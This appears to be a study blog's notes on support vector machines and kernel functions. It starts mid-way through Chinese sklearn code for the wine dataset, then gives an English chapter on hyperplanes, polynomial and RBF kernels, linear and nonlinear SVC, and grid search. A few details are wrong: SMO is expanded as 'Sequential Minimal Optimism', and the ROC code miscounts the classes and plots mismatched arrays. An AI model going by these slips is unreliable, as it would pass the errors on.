    print("使用 SVM 预测 wine 数据的准确率是:%f"
    % (accuracy_score(test_label, test_pred)))
    print("使用 SVM 预测 wine 数据的精确率是:%f"
    % (precision_score(test_label, test_pred, average="macro")))
    # 对多分类要加 average="macro"
    print("使用 SVM 预测 wine 数据的召回率是:%f"
    % (recall_score(test_label, test_pred, average="macro")))
    print("使用 SVM 预测 wine 数据的 F1 值是:%f"
    % (f1_score(test_label, test_pred, average="macro")))
    print("使用 SVM 预测 wine 数据的 Cohen’s Kappa 系数是:%f"
    % (cohen_kappa_score(test_label, test_pred)))
    print("使用 SVM 预测 wine 数据的分类报告为:\n",
    classification_report(test_label, test_pred))
    # 3、画出预测结果和真实结果对比的图
    print("---------测试集的结果图--------")
    plt.plot(test_pred,'bo', label="预测")
    plt.plot(test_label,'r*', label="真实")
    plt.xlabel(r'测试集样本',color='r', fontsize=18)
    plt.ylabel(r'类别标签',color='r', fontsize=18, rotation=360)
    plt.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)
    plt.title('测试集的实际分类和预测分类图', fontsize=18)
    plt.show()


    # 调用结果函数
    # 调用相关库
    from sklearn.metrics import accuracy_score,precision_score, \
    recall_score,f1_score,cohen_kappa_score
    from sklearn.metrics import classification_report
    import matplotlib.pyplot as plt

    # 图表中显示中文
    from pylab import *

    mpl.rcParams['font.sans-serif'] = ['SimHei']
    mpl.rcParams['axes.unicode_minus'] = False
    result_show_analyse(wine_test,wine_test_label) # 调用结果模块
    ---------测试集的结果--------测试集的真实结果为: [1 2 0 1 2 2 1 1 1 1 2 1 2 2 2 0 2 0 1 0 2 0 1 1 0 0 1 1 1 2 2 1 0 1 2 2]测试集的预测结果为: [1 2 0 1 1 2 1 1 1 1 2 1 2 2 2 0 2 0 1 0 2 0 1 1 0 0 1 1 1 2 2 1 0 1 2 2]预测对的结果数目为:35预测错的结果数目为:1训练时间:00:00:003162---------测试集的结果分析--------使用 SVM 预测 wine 数据的准确率是:0.972222使用 SVM 预测 wine 数据的精确率是:0.979167使用 SVM 预测 wine 数据的召回率是:0.974359使用 SVM 预测 wine 数据的 F1 值是:0.975914使用 SVM 预测 wine 数据的 Cohen’s Kappa 系数是:0.956938使用 SVM 预测 wine 数据的分类报告为:               precision    recall  f1-score   support           0       1.00      1.00      1.00         8           1       0.94      1.00      0.97        15           2       1.00      0.92      0.96        13    accuracy                           0.97        36   macro avg       0.98      0.97      0.98        36weighted avg       0.97      0.97      0.97        36---------测试集的结果图--------

    png

    【Sklearn】sklearn.metrics 中的评估方法

    通常以关注的类为正类,其他类为负类。分类器在测试数据集上预测要么正确要么不正确。4 种情况出现的总数分别记作:

    名称说明
    tp(true positive)将正类预测为正类
    fn(false negative)将正类预测为负类
    fp(false positive)将负类预测为正类
    tn(true negative)将负类预测为负类

    分类 0 混淆矩阵:

    预测属于分类 0预测不属于分类 0
    实际属于分类 0tp = 8fn = 0
    实际不属于分类 0fp = 0tn = 28
    precisionrecallf1-score
    $P=\frac{tp}{tp+fp}=1$$R=\frac{tp}{tp+fn}=1$$\frac{2PR}{P+R}=1$

    分类 1 混淆矩阵:

    预测属于分类 1预测不属于分类 1
    实际属于分类 1tp = 15fn = 0
    实际不属于分类 1fp = 1tn = 20
    precisionrecallf1-score
    $P=\frac{tp}{tp+fp}=\frac{15}{16}=0.9375$$R=\frac{tp}{tp+fn}=1$$\frac{2PR}{P+R}=\frac{30}{31}=0.9677$

    分类 2 混淆矩阵:

    预测属于分类 2预测不属于分类 2
    实际属于分类 2tp = 12fn = 1
    实际不属于分类 2fp = 0tn = 23
    precisionrecallf1-score
    $P=\frac{tp}{tp+fp}=1$$R=\frac{tp}{tp+fn}=\frac{12}{13}=0.923$$\frac{2PR}{P+R}=\frac{24}{25}=0.96$

    (6) 分类结果的混淆矩阵及图表显示

    from sklearn import metrics


    def cm_plot(y,yp):
    conf_mx = metrics.confusion_matrix(y, yp) # 模型对于测试集的混淆矩阵
    print("测试集的混淆矩阵:\n",conf_mx)
    # 画混淆矩阵图,配色风格使用 cm.Greens
    # (太丑了, 我要用 Oranges, https://blog.csdn.net/weixin_51111267/article/details/122605388)
    plt.matshow(conf_mx,cmap=plt.cm.Oranges)
    plt.colorbar()# 颜色标签
    for x in range(len(conf_mx)):
    for y in range(len(conf_mx)):
    plt.annotate(conf_mx[x,y],xy=(x,y),horizontalalignment='center',
    verticalalignment='center')
    plt.ylabel('True label')# 坐标轴标签
    plt.xlabel('Predicted label')# 坐标轴标签
    return plt


    wine_test_pred=model.predict(wine_test)
    cm_plot(wine_test_label, wine_test_pred).show()
    测试集的混淆矩阵: [[ 8  0  0] [ 0 15  0] [ 0  1 12]]

    png

    10.9 高手点拨

    10.9.1 SMO 算法

    SVM 对应的优化算法, 以牺牲精度换取时间

    Sequential Minimal Optimism

    序列 最小 最优化 算法

    10.9.3 核函数的选取

    对于高斯径向基核函数, 可以通过求准确率, 画学习曲线来调整 gamma 值

    #取不同 gamma 值得到的准确率
    score = []
    gamma_range = np.logspace(-10, 1, 50) # 得到不同的 gamma 值即对数刻度上均匀间隔的数
    for i in gamma_range:
    model = SVC(kernel="rbf",gamma = i, cache_size=5000)
    model.fit(wine_train, wine_train_label)
    score_gamma = model.score(wine_test, wine_test_label)
    score.append(score_gamma)
    print("最大的准确率为:",max(score))
    print("对应的 gamma 值", gamma_range[score.index(max(score))])
    plt.xlabel("gamma 取值")
    plt.ylabel("准确率")
    plt.title("gamma 的学习曲线")
    plt.plot(gamma_range,score)
    plt.show()
    最大的准确率为:1.0对应的 gamma 值 0.020235896477251554

    png

    10.9.4 多分类 ROC 曲线的绘制

    【小学生都会的机器学习】一个视频帮各位总结好了混淆矩阵、召回率、精准率、ROC 等…

    ROC 曲线绘制原理及如何用 SPSS 绘制 ROC 曲线

    ROC 曲线越接近左上角, 代表模型性能越好

    from itertools import cycle
    from sklearn.metrics import roc_curve, auc
    from sklearn.model_selection import train_test_split
    from sklearn.preprocessing import label_binarize
    from numpy import interp


    def plot_roc(test, test_label, test_pred):
    """
    :param test: 测试样本的数据
    :param test_label: 测试样本的标签
    :param test_pred: 测试样本的预测值
    """
    class_num = sum(unique(test_label)) # 类别数
    Y_pred = test_pred
    # 对输出进行二值化
    # Y_label 样例真实标签,Y_pred 学习器预测的标签
    Y_label = label_binarize(test_label, classes=[i for i in range(class_num)])
    Y_pred = label_binarize(Y_pred, classes=[i for i in range(class_num)])
    # 计算每一类的 ROC
    # dict() 用于创建一个字典
    fpr = dict() # 假正例率(False Positive Rate , FPR)
    tpr = dict() # 真正例率(True Positive Rate , TPR)
    roc_auc = dict() # ROC 曲线下方的面积
    for i in range(class_num):
    fpr[i], tpr[i], _ = roc_curve(Y_label[:, i], Y_pred[:, i])
    roc_auc[i] = auc(fpr[i], tpr[i])
    # 计算 micro-average ROC 曲线和 ROC 面积
    fpr["micro"], tpr["micro"], _ = roc_curve(Y_label.ravel(), Y_pred.ravel())
    roc_auc["micro"] = auc(fpr["micro"], tpr["micro"])

    # 计算 macro-average ROC 曲线 and ROC 面积
    # 第一步:汇总所有误报率 aggregate all false positive rates
    all_fpr = np.unique(np.concatenate([fpr[i] for i in range(class_num)]))

    # 第二步:在此点插值所有 ROC 曲线 interpolate all ROC curves at this points
    mean_tpr = np.zeros_like(all_fpr)
    for i in range(class_num):
    mean_tpr += interp(all_fpr, fpr[i], tpr[i])
    # 第三步:最后对其进行平均并计算 AUC Finally average it and compute AUC
    mean_tpr /= class_num
    fpr["macro"] = all_fpr
    tpr["macro"] = mean_tpr
    roc_auc["macro"] = auc(fpr["macro"], tpr["macro"])
    # 画出具体的某一类的 ROC 曲线,如第一类
    plt.figure()
    lw = 2
    plt.plot(fpr[1], tpr[2], color="darkorange",
    lw=lw, label="ROC curve (area = %0.2f)" % roc_auc[1])
    plt.plot([0, 1], [0, 1], color="navy", lw=lw, linestyle="--")
    plt.xlim([0.0, 1.0])
    plt.ylim([0.0, 1.05])
    plt.xlabel("假正例率 False Positive Rate(FPR)")
    plt.ylabel("真正例率 True Positive Rate(TPR)")
    plt.title("Receiver operating characteristic example")
    plt.legend(loc="lower right")
    plt.show()

    # 画出所有类的 ROC 曲线
    lw = 2 # line width
    plt.figure()
    plt.plot(fpr["micro"], tpr["micro"],
    label="micro-average ROC 曲线 (area = {0:0.2f})"
    "".format(roc_auc["micro"]),
    color="deeppink", linestyle=":", linewidth=4)

    plt.plot(fpr["macro"], tpr["macro"],
    label="macro-average ROC 曲线 (area = {0:0.2f})"
    "".format(roc_auc["macro"]),
    color="navy", linestyle=":", linewidth=4)
    colors = cycle(["aqua", "darkorange", "cornflowerblue"])
    for i, color in zip(range(class_num), colors):
    plt.plot(fpr[i], tpr[i], color=color, lw=lw,
    label="ROC curve of class {0} (area = {1:0.2f})"
    "".format(i, roc_auc[i]))

    plt.plot([0, 1], [0, 1], "k--", lw=lw)
    plt.xlim([0.0, 1.0])
    plt.ylim([0.0, 1.05])
    plt.xlabel("假正例率 False Positive Rate(FPR)")
    plt.ylabel("真正例率 True Positive Rate(TPR)")
    plt.title('Some extension of Receiver operating characteristic'
    'to multi-class')
    plt.legend(loc="lower right")
    plt.show()


    # 调用画 ROC 曲线的函数
    model = SVC() # 实例化,设置模型参数
    model.fit(wine_train, wine_train_label)
    wine_test_pred = model.predict(wine_test)
    plot_roc(wine_test, wine_test_label, wine_test_pred)

    png

    png

    10.10 习题 构建基于 iris 数据集的 SVM 分类模型

    https://scikit-learn.org/stable/modules/generated/sklearn.datasets.load_iris.html

    import numpy as np
    from sklearn import svm
    from sklearn.svm import SVC
    from sklearn.model_selection import train_test_split
    from sklearn.datasets import load_iris
    from sklearn.preprocessing import StandardScaler
    from sklearn.metrics import classification_report
    import matplotlib.pyplot as plt
    import matplotlib as mpl
    from time import time

    # (1) 读取数据集, 区分标签和数据
    iris = load_iris()
    iris_data = iris.data
    iris_label = iris.target
    # (2) 标准化数据集
    iris_data = StandardScaler().fit_transform(iris_data)
    # (3) 将数据集划分为训练集和测试集
    iris_train, iris_test, iris_train_label, iris_test_label = \
    train_test_split(iris_data, iris_label, test_size=0.2)
    # (4) 构建 SVM 模型
    model = SVC()
    model.fit(iris_train, iris_train_label)
    iris_test_pred = model.predict(iris_test)
    # (5) 输出预测测试集结果, 评价分类模型性能, 输出测试报告
    print(classification_report(iris_test_label, iris_test_pred))
    mpl.rcParams['font.sans-serif'] = ['SimHei']
    mpl.rcParams['axes.unicode_minus'] = False
    print("---------测试集的结果图--------")
    plt.plot(iris_test_pred,'bo', label="预测")
    plt.plot(iris_test_label,'r*', label="真实")
    plt.xlabel(r'测试集样本',color='r', fontsize=18)
    plt.ylabel(r'类别标签',color='r', fontsize=18, rotation=360)
    plt.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)
    plt.title('测试集的实际分类和预测分类图', fontsize=18)
    plt.show()
                  precision    recall  f1-score   support           0       1.00      1.00      1.00         9           1       0.92      0.92      0.92        13           2       0.88      0.88      0.88         8    accuracy                           0.93        30   macro avg       0.93      0.93      0.93        30weighted avg       0.93      0.93      0.93        30---------测试集的结果图--------

    png

    ]]>
+ Main text

10 Spatial Transformation of Data: Kernel Transforms

10.1 Background Concepts

10.1.1 Hyperplanes

A hyperplane has one fewer degree of freedom than the space containing it; in an n-dimensional space it is (n-1)-dimensional

In an n-dimensional space $F^n$, a hyperplane is the subset defined by $a _ 1 x _ 1 + … + a _ n x _ n = b$, where $a _ 1, …, a _ n \in F$ are constants that are not all zero

It can also be written as $\mathbf{w\cdot x}+b=0$, where $\mathbf{w}$ and $\mathbf{x}$ are n-dimensional column vectors, $\mathbf{w}=[w _ 1,w _ 2,…,w _ n]^T$, $\mathbf{x}=[x _ 1,x _ 2,…,x _ n]^T$

• $\mathbf{w}$ can be viewed either as the normal vector of the hyperplane or as its parameters; it determines the hyperplane's orientation

• $\mathbf{x}$ is a point on the hyperplane

• $b$ is a real number (the bias); the distance from the origin to the hyperplane is $\frac{\left | b \right |}{\left \| \mathbf{w} \right \|}$

• $\mathbf{w\cdot x}$ is the inner product of $\mathbf{w}$ and $\mathbf{x}$; the result is a scalar

• The inner product of vectors can be written as a matrix product, so $\mathbf{w\cdot x}=\mathbf{w}^T\mathbf{x}$, where $\mathbf{w}^T$ is the transpose of $\mathbf{w}$

• The hyperplane divides the space into 3 parts: the hyperplane itself $\mathbf{w\cdot x}+b=0$, the upper side $\mathbf{w\cdot x}+b>0$, and the lower side $\mathbf{w\cdot x}+b<0$ (see the sketch below)
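A minimal numerical sketch of the three-way partition; the hyperplane $\mathbf{w}=(1,1)$, $b=-4$ and the test points are arbitrary choices for illustration:

import numpy as np

# Hypothetical hyperplane in R^2: w = (1, 1), b = -4, i.e. x1 + x2 - 4 = 0
w = np.array([1.0, 1.0])
b = -4.0

points = np.array([[4, 3], [3, 3], [1, 1], [2, 2]])
side = points @ w + b  # the sign tells on which side of the hyperplane each point lies
print(side)            # [ 3.  2. -2.  0.] -> above, above, below, on the hyperplane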

10.1.2 Linear Classification

If a separating hyperplane can completely separate two classes of samples, the samples are called "linearly separable". An ellipse in two-dimensional space is not a separating hyperplane (it is not one-dimensional), so classes separable only by an ellipse are not linearly separable

10.1.3 Lifting to a Higher Dimension

Map the samples from the original low-dimensional input space into a higher-dimensional feature space, increasing the dimensionality of the data

A problem that is not linearly separable can be handled by lifting: find a suitable mapping that transforms the low-dimensional vector $\mathbf{x}$ into a high-dimensional vector $\mathbf{x}'$; then, in the high-dimensional space, take the inner product of $\mathbf{x}'$ with $\mathbf{w}$ and add b to obtain a separating hyperplane and a linear model for classification or regression. In this way a nonlinearly separable problem in the low-dimensional input space becomes linearly separable in the high-dimensional feature space

10.2 Introducing Kernel Functions

10.3.1 Definition of a Kernel Function

Let $\chi$ be the input space (a Euclidean space or a discrete set) and H the feature space (a Hilbert space, which can loosely be thought of as a higher-dimensional space). If there exists a mapping from $\chi$ to H, $f(\mathbf{x}):\chi \to H$, such that for all $\mathbf{x},\mathbf{y}\in \chi$ the function satisfies $K(\mathbf{x},\mathbf{y})=f(\mathbf{x})\cdot f(\mathbf{y})$, then $K(\mathbf{x}, \mathbf{y})$ is called a kernel function

Any positive semidefinite function can serve as a kernel function (see the Gram-matrix check below)

10.3.3 Properties of Kernel Functions

• Computation happens in the original space, which avoids the "curse of dimensionality", greatly reduces the amount of computation, and handles high-dimensional inputs effectively
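A minimal sketch of the positive-semidefiniteness condition: a valid kernel must produce a positive semidefinite Gram matrix $K _ {ij}=K(\mathbf{x} _ i,\mathbf{x} _ j)$ on any set of points. Checking this numerically for the RBF kernel (the random data and $\sigma = 1$ are arbitrary choices):

import numpy as np

rng = np.random.default_rng(0)
X = rng.normal(size=(20, 3))

# Gram matrix of the RBF kernel with sigma = 1
sq_dists = ((X[:, None, :] - X[None, :, :]) ** 2).sum(-1)
K = np.exp(-0.5 * sq_dists)

eigvals = np.linalg.eigvalsh(K)      # symmetric matrix -> real eigenvalues
print(eigvals.min() >= -1e-10)       # True: all eigenvalues >= 0 (up to rounding)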

10.4 Common Kernel Functions

| Name | Description |
| --- | --- |
| Linear kernel | Applies no transformation to the data and needs no parameters; fast; used for linearly separable data; suited to datasets with very high dimensionality and a comparable number of samples; one can also lift the data manually and then apply the linear kernel |
| Polynomial kernel | Leans linear; well suited to image processing; parameters can be tuned for good results |
| Gaussian RBF kernel | Leans nonlinear; broadly applicable; the default kernel of SVM; suited to datasets with lower dimensionality and a moderate number of samples |

10.4.1 Linear Kernel

$$K(\mathbf{x},\mathbf{y})=\mathbf{x}\cdot \mathbf{y}$$

The linear kernel is the simplest kernel; the corresponding mapping is the identity, $f(\mathbf{z})=\mathbf{z}$

10.4.2 Polynomial Kernel

$$K(\mathbf{x},\mathbf{y})=\left [ \gamma (\mathbf{x}\cdot \mathbf{y})+c \right ]^d$$

• $\gamma > 0$, usually set to 1 / (number of classes); it rescales the inner product $(\mathbf{x}\cdot \mathbf{y})$

• c is the constant term; when c > 0 the kernel is called a non-homogeneous polynomial kernel

• d is the degree of the polynomial, typically d = 2; if d is too large, the learning problem becomes overly complex and overfitting is likely

• The feature dimension after the mapping induced by the polynomial kernel is $C ^d _ {n+d}$, where n is the dimension of $\mathbf{x}$ (see the sketch below)
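A quick sketch of that dimension formula using math.comb; the (n, d) pairs are arbitrary:

from math import comb

# Dimension C(n + d, d) of the polynomial feature space for an
# n-dimensional input and a degree-d kernel:
for n, d in [(2, 2), (4, 2), (4, 3), (13, 2)]:
    print(n, d, comb(n + d, d))
# 2 2 6
# 4 2 15   <- matches the worked example below (n = 4, d = 2)
# 4 3 35
# 13 2 105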

A commonly used polynomial kernel

$K(\mathbf{x},\mathbf{y})=\left [ \gamma (\mathbf{x}\cdot \mathbf{y})+1 \right ]^2$

$K(\mathbf{x},\mathbf{y})=\left [ (\mathbf{x}\cdot \mathbf{y})+1\right ]^2=(\Sigma^n _ {i=1}\mathbf{x} _ i \mathbf{y} _ i + 1)^2$

$={\color{Red}{\Sigma^n _ {i=1} \mathbf{x}^2 _ i \mathbf{y}^2 _ i}} + {\color{Blue}{\Sigma^n _ {i=2}\Sigma^{i-1} _ {j=1}(\sqrt 2 \mathbf{x} _ i\mathbf{x} _ j)(\sqrt 2 \mathbf{y} _ i\mathbf{y} _ j)}}+ {\color{Green}{\Sigma^n _ {i=1}(\sqrt 2 \mathbf{x} _ i)(\sqrt 2 \mathbf{y} _ i)}} + {\color{Purple}1}$

So $f(\mathbf{z})=\left[{\color{Red}{z^2 _ n, z^2 _ {n-1},…,z^2 _ 1}}, {\color{Blue}{\sqrt 2 z _ n z _ {n-1},…,\sqrt 2 z _ 2 z _ 1}}, {\color{Green}{\sqrt 2 z _ n,…,\sqrt 2 z _ 1}}, {\color{Purple}{1}}\right]$

Using this kernel, let $\mathbf{X}=[1, 2, 3, 4]$, $\mathbf{Y}=[5, 6, 7, 8]$. The original input space has dimension 4; after the mapping, the feature dimension reaches $C ^4 _ {4+2}=15$. Verify that $K(\mathbf{x},\mathbf{y})=f(\mathbf{x})\cdot f(\mathbf{y})$.

import numpy as np


def f(Z):
    """
    Explicit feature map of the degree-2 polynomial kernel (time complexity O(n^2)).
    """
    Z1 = Z ** 2                          # squared terms
    Z_shape = np.shape(Z)[1] - 1
    Z0 = []
    for i in range(Z_shape, 0, -1):      # cross terms sqrt(2) * z_i * z_j (i > j)
        for j in range(i - 1, -1, -1):
            xy = Z[0, i] * Z[0, j] * 2 ** 0.5
            Z0.append(xy)
    Z2 = np.array(Z0).reshape(1, -1)
    Z3 = Z * 2 ** 0.5                    # linear terms sqrt(2) * z_i
    return np.hstack((Z1, Z2, Z3, [[1]]))  # plus the constant 1


X = np.array([[1, 2, 3, 4]])  # 4-dimensional row vector
Y = np.array([[5, 6, 7, 8]])
# Compute with the polynomial kernel
XY_poly = (X.dot(Y.T) + 1) ** 2
print("Result via the polynomial kernel:", XY_poly)
# Compute via the explicit mapping
X1 = f(X)
Y1 = f(Y)
print("Result via the explicit mapping:", X1.dot(Y1.T))
print("Mapped value of X:\n", X1)
print("Mapped value of Y:\n", Y1)
print("Dimension of the original input space:", np.shape(X)[1])
print("Dimension of the mapped feature space:", np.shape(X1)[1])

Result via the polynomial kernel: [[5041]]
Result via the explicit mapping: [[5041.]]
Mapped value of X:
 [[ 1.          4.          9.         16.         16.97056275 11.3137085
    5.65685425  8.48528137  4.24264069  2.82842712  1.41421356  2.82842712
    4.24264069  5.65685425  1.        ]]
Mapped value of Y:
 [[25.         36.         49.         64.         79.19595949 67.88225099
   56.56854249 59.39696962 49.49747468 42.42640687  7.07106781  8.48528137
    9.89949494 11.3137085   1.        ]]
Dimension of the original input space: 4
Dimension of the mapped feature space: 15

10.4.3 Gaussian RBF Kernel

$$K(\mathbf{x},\mathbf{y})=e^{-\frac{\left \| \mathbf{x}-\mathbf{y}\right \| ^2}{2\sigma^2}}$$

The corresponding feature map is infinite-dimensional (see the sketch below)
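To see why the map is infinite-dimensional, note that for scalar inputs $K(x,y)=e^{-\gamma(x-y)^2}=e^{-\gamma x^2}e^{-\gamma y^2}\Sigma^{\infty} _ {k=0}\frac{(2\gamma)^k}{k!}x^k y^k$, a sum over infinitely many monomial features. A minimal numerical sketch; the truncation order 12 and the values of gamma, x, y are arbitrary choices:

import numpy as np
from math import factorial

gamma = 0.5
x, y = 0.7, -0.3


def phi(z, order=12):
    # Truncated RBF feature map for scalar z:
    # phi_k(z) = e^{-gamma z^2} * sqrt((2 gamma)^k / k!) * z^k
    return np.array([np.exp(-gamma * z ** 2) * np.sqrt((2 * gamma) ** k / factorial(k)) * z ** k
                     for k in range(order)])


exact = np.exp(-gamma * (x - y) ** 2)
approx = phi(x) @ phi(y)
print(exact, approx)  # the truncated inner product converges to the exact kernel value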

10.6 How SVM Works

SVM = Support Vector Machine

SVC = Support Vector Classification, i.e. the support vector machine used for classification

SVR = Support Vector Regression, i.e. the support vector machine used for regression analysis

Reference: python machine learning | introduction to and implementation of the SVM algorithm

10.6.7 Implementing a Linearly Separable SVM

Given a training set whose positive examples are $x _ 1 = (4, 3)$, $x _ 2 = (3, 3)$ and whose negative example is $x _ 3 = (1, 1)$, use the SVC class from sklearn to fit a support vector machine; report the support vectors, their number and the model parameters, and predict the classes of the points $(4, 5)$, $(0, 0)$ and $(1, 3)$.

import numpy as np
from sklearn.svm import SVC  # import the SVC model
import matplotlib.pyplot as plt
import matplotlib as mpl

# Load the data
train_x = np.array([[4, 3], [3, 3], [1, 1]])
train_y = np.array([1, 1, -1])  # the corresponding class labels
print("Training set (rightmost column is the label):\n",
      np.hstack((train_x, train_y.reshape(3, 1))))

# Instantiate SVC and train
model = SVC(kernel="linear")  # instantiate with a linear kernel
model.fit(train_x, train_y)   # fit the model on the training data

# Predict
test_x = np.array([[4, 5], [0, 0], [1, 3]])
test_y = model.predict(test_x)
print("Predicted classes of [4, 5], [0, 0], [1, 3]:", test_y)

# Relevant attributes and return values
w = model.coef_[0]   # the weight (normal) vector w
a = -w[0] / w[1]     # slope of the separating line
b = model.intercept_
print("Support vectors:\n", model.support_vectors_)
print("Indices of the support vectors:", model.support_)
print("Number of support vectors per class:", model.n_support_)
print("Distances from the training set to the separating hyperplane:", model.decision_function(train_x))
print("Parameter (normal vector) w =", w)
print("Slope of the separating line a =", a)
print("Hyperplane intercept b:", b)  # the constant term of the hyperplane
print("Coefficients", model.coef_)   # per-feature coefficients; only available for linear kernels
print("The hyperplane equation is {}x + {}y {} = 0".format(w[0], w[1], b[0]))

# Plot
mpl.rcParams["font.sans-serif"] = ["Microsoft YaHei"]
mpl.rcParams['axes.unicode_minus'] = False
plt.figure()
plt.axis("equal")
for i in range(len(train_x)):  # marker "x" for label -1, "o" for label +1
    plt.scatter(train_x[i][0], train_x[i][1], color="red",
                marker=["x", "o"][int(train_y[i] * 0.5 + 0.5)])
for i in range(len(test_x)):
    plt.scatter(test_x[i][0], test_x[i][1], color="blue",
                marker=["x", "o"][int(test_y[i] * 0.5 + 0.5)])
plt.plot(np.linspace(0, 4, 2), a * np.linspace(0, 4, 2) - b / w[1])
# Proxy artists with empty data, used only to build the legend
plt.legend(handles=[plt.scatter([], [], color="red", marker="o"), plt.scatter([], [], color="red", marker="x"),
                    plt.scatter([], [], color="blue", marker="o"), plt.scatter([], [], color="blue", marker="x")],
           labels=['train positive', 'train negative', 'test positive', 'test negative'], loc='best')
plt.show()

Training set (rightmost column is the label):
 [[ 4  3  1]
 [ 3  3  1]
 [ 1  1 -1]]
Predicted classes of [4, 5], [0, 0], [1, 3]: [ 1 -1  1]
Support vectors:
 [[1. 1.]
 [3. 3.]]
Indices of the support vectors: [2 1]
Number of support vectors per class: [1 1]
Distances from the training set to the separating hyperplane: [ 1.5  1.  -1. ]
Parameter (normal vector) w = [0.5 0.5]
Slope of the separating line a = -1.0
Hyperplane intercept b: [-2.]
Coefficients [[0.5 0.5]]
The hyperplane equation is 0.5x + 0.5y -2.0 = 0

(Figure: training and test points with the separating line x + y - 4 = 0)

10.7 Nonlinear SVM and the Introduction of Kernel Functions

Reference: kernel functions and nonlinear support vector machines (SVM)

10.7.2 Implementing a Nonlinear SVM

(1) Import the relevant libraries
# Import the relevant libraries:
import numpy as np
from sklearn.svm import SVC
import matplotlib.pyplot as plt
from sklearn.datasets import make_circles  # generates concentric-circle data
import matplotlib as mpl

mpl.rcParams['font.sans-serif'] = ['SimHei']

(2) Plot the scatter points and support vectors with the function plot_decision_boundary()
def plot_decision_boundary(model, X, y, h=0.03, draw_SV=True, title='decision_boundary'):
    """
    Plot a classified dataset.
    :param model: fitted classifier
    :param X: sample features
    :param y: sample labels
    :param h: grid step size
    :param draw_SV: whether to mark the support vectors
    :param title: plot title
    """
    X_min, X_max = X[:, 0].min() - 1, X[:, 0].max() + 1
    y_min, y_max = X[:, 1].min() - 1, X[:, 1].max() + 1
    # Drawing the decision boundary needs a grid; np.meshgrid() builds coordinate matrices
    # Syntax: X, Y = numpy.meshgrid(x, y)
    # inputs x, y: the coordinate vectors of the grid points
    # outputs X, Y: the coordinate matrices
    xx, yy = np.meshgrid(np.arange(X_min, X_max, h), np.arange(y_min, y_max, h))
    # Predict the class of every point in the grid
    label_predict = model.predict(np.stack((xx.flat, yy.flat), axis=1))
    # Put the result into a color plot
    label_predict = label_predict.reshape(xx.shape)  # same shape as the input grid
    plt.title(title)
    plt.xlim(xx.min(), xx.max())
    plt.ylim(yy.min(), yy.max())
    plt.xticks(())  # hide the axis ticks
    plt.yticks(())
    # contour() draws contour lines; contourf() fills the contours
    plt.contourf(xx, yy, label_predict, alpha=0.5)  # fill each predicted class with a different color
    markers = ['x', '^', 'o']
    colors = ['b', 'r', 'c']  # blue, red, cyan
    # For a 1-D array or list, np.unique removes duplicate elements and
    # returns the sorted unique values
    classes = np.unique(y)
    # Scatter plot for each class
    for label in classes:
        plt.scatter(X[y == label][:, 0], X[y == label][:, 1],
                    c=colors[label], s=60, marker=markers[label])
    # Mark the support vectors, using a different color for each of the two classes
    if draw_SV:
        SV = model.support_vectors_   # get the support vectors
        n = model.n_support_[0]       # number of support vectors in the first class
        plt.scatter(SV[:n, 0], SV[:n, 1], s=15, c='black', marker='o')
        plt.scatter(SV[n:, 0], SV[n:, 1], s=15, c='g', marker='o')

(3) Generate a synthetic classification dataset and plot it
"""
make_circles:
n_samples : int, optional (default=100)
    Total number of points generated. If odd, the inner circle gets one extra point.
shuffle : bool, optional (default=True)
    Whether to shuffle the samples.
noise : double or None (default=None)
    Standard deviation of Gaussian noise added to the data.
random_state : int, RandomState instance or None (default)
    Determines random number generation for dataset shuffling and noise.
    Pass an int for reproducible output across multiple function calls. See the glossary.
factor : 0 < double < 1 (default=0.8)
    Scale factor between the inner and outer circle.
"""
X, y = make_circles(200, factor=0.1, noise=0.1)  # generate the sample points
plt.scatter(X[y == 0, 0], X[y == 0, 1], c='b', s=20, marker='x')  # first class
plt.scatter(X[y == 1, 0], X[y == 1, 1], c='r', s=20, marker='^')  # second class
plt.xticks(())
plt.yticks(())
plt.title('Dataset')
plt.show()  # plot the dataset

(Figure: the two concentric-circle classes)

(4) Using SVC, build SVMs with a linear kernel and a degree-3 polynomial kernel, and plot the results
plt.figure(figsize=(12, 10), dpi=200)
# Classify with a linear kernel
model_linear = SVC(C=1.0, kernel='linear')  # instantiate with a linear kernel
model_linear.fit(X, y)                      # fit the model on the training data

# Plot the decision boundary of the linear kernel
plt.subplot(2, 2, 1)
plot_decision_boundary(model_linear, X, y, title='linear kernel')
print("Number of support vectors with the linear kernel:", model_linear.n_support_)

# Classify with a polynomial kernel
model_poly = SVC(C=1.0, kernel='poly', degree=3, gamma="auto")  # instantiate with a polynomial kernel
model_poly.fit(X, y)
# Plot the decision boundary of the polynomial kernel
plt.subplot(2, 2, 2)
plot_decision_boundary(model_poly, X, y, title='polynomial kernel')
print("Number of support vectors with the polynomial kernel:", model_poly.n_support_)
plt.show()

Number of support vectors with the linear kernel: [100 100]
Number of support vectors with the polynomial kernel: [100 100]

(Figure: decision regions of the linear and degree-3 polynomial kernels)

(5) Using SVC(), build 4 SVMs with the Gaussian RBF kernel and gamma values 10, 1, 0.1, 0.01, and plot the results
plt.figure(figsize=(12, 10), dpi=200)
# enumerate() pairs each item of an iterable (list, tuple, string, ...)
# with its index; it is typically used in for loops.
for j, gamma in enumerate((10, 1, 0.1, 0.01)):
    plt.subplot(2, 2, j + 1)
    model_rbf = SVC(C=1.0, kernel='rbf', gamma=gamma)  # Gaussian kernel
    model_rbf.fit(X, y)
    # Call the plotting function
    plot_decision_boundary(model_rbf, X, y, title='rbf kernel, gamma=' + str(gamma))
    print("rbf kernel, gamma=", str(gamma), "number of support vectors:", model_rbf.n_support_)
plt.show()

rbf kernel, gamma= 10 number of support vectors: [30  7]
rbf kernel, gamma= 1 number of support vectors: [9 8]
rbf kernel, gamma= 0.1 number of support vectors: [96 96]
rbf kernel, gamma= 0.01 number of support vectors: [100 100]

(Figure: RBF decision regions for gamma = 10, 1, 0.1, 0.01)

(6) Going further
from sklearn.model_selection import GridSearchCV

tuned_parameters = [{'kernel': ['rbf'], 'gamma': [1, 0.1, 0.01], 'C': [0.1, 1, 10]},
                    {'kernel': ['linear'], 'C': [0.1, 1, 10]},
                    {'kernel': ['poly'], 'gamma': [1, 0.1, 0.01], 'C': [0.1, 1, 10]}]
# GridSearchCV() automates parameter tuning: given a parameter grid,
# it returns the best score and the parameters that achieve it
# https://blog.csdn.net/weixin_41988628/article/details/83098130
model_grid = GridSearchCV(SVC(), tuned_parameters, cv=5)
model_grid.fit(X, y)
print("The best parameters are %s with a score of %0.2f"
      % (model_grid.best_params_, model_grid.best_score_))

The best parameters are {'C': 0.1, 'gamma': 1, 'kernel': 'rbf'} with a score of 1.00
